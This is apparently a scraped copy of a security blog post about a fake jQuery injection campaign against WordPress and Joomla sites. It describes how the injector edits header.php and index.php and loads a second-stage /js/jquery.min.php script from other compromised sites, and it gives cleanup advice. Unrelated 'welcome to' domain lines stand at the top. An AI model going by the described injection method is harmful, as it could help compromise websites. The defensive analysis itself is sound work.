11052015_jquiryInjection_V2

welcome to http://www.startdays.com
welcome to http://www.ijachouf.com
welcome to http://www.swtools.biz
welcome to http://www.decoderhd.com

[13]11052015_jquiryInjection_V2

Fake jQuery injections have been popular among hackers since jQuery
itself went mainstream and became one of the most widely adopted
JavaScript libraries.

Every now and then [14]we [15]write [16]about [17]such [18]attacks.
Almost every week we see new fake jQuery domains and scripts that mimic
jQuery. For example, one of the most prevalent malware infections of
the last couple of weeks is the attack that injects fake jQuery script
into the head section of WordPress and Jooma sites.

The script is injected right before the closing </head> tag and looks
like this:
[19]Fake jQuery script malware in Joomla and WordPress websites

Fake jQuery script malware in Joomla and WordPress websites

There are a few interesting things about this malware that I want to
talk about here.

Not Obfuscated

Although it infects PHP files, the injected code is in JavaScript.
Hackers decided not to obfuscate it. Probably to make it less prominent
during manual code reviews. This also helps keep thing simple, and as
I'll show later, the attackers need to change the injected code often
and their coding skills are not that great.

Hosting Script on Multiple Compromised Sites

After a 10 second timeout, the JS code dynamically injects another
script that looks like this:
http://infected-site.com/js/jquery.min.php

Where infected-site.com is some compromised third-party site where
hackers placed their malicious scripts. The domain changes from site to
site, and on the same site after reinfections. Literally every site
with the injected JS malware can also be reused to host the
/js/jquery.min.php script.

Bugs in the Malware Injector

As you might have noticed, there are two identical scripts injected
scripts on the screenshot. This happens quite often because of a bug in
the malware injector. It simply looks for the </head> tad and injects
malware right before it. It doesn't check whether that file already
contains the malicious code.

Since hackers try to regularly update the code in order to use new
domains or just reinfect sites that have removed the removed malware,
many infected web pages can contain more than one malicious script -
sometimes more than 10 of them. The same flawed logic makes them inject
the script in other inappropriate places (e.g. inside comments that
contain the word </head>).

Infected Themes and Templates

The main targets of this attack are WordPress and Joomla sites. When
hackers break into such a site, they run a script that looks for all
WordPress and Joomla installations on the compromised server account
and then injects that malicious JavaScript code into the header.php
file in every WordPress theme and into the index.php file in every
Joomla template (or whatever file that has the </head> tag). This makes
the cleanup relatively easy. You just need to remove the malicious code
from header.php (WP) or index.php (Joomla) or just restore them from a
clean backup, plus check for the jquery.min.php in the /js directory.

To check if you're infected, you can leverage our [20]free malware
scanner - SiteCheck. Here is what the output may look like:

[21]Massive Malware Campaign Targets WordPress and Joomla
---------------------------------------------------------------
---------------------------------------------------------------
---------------------------------------------------------------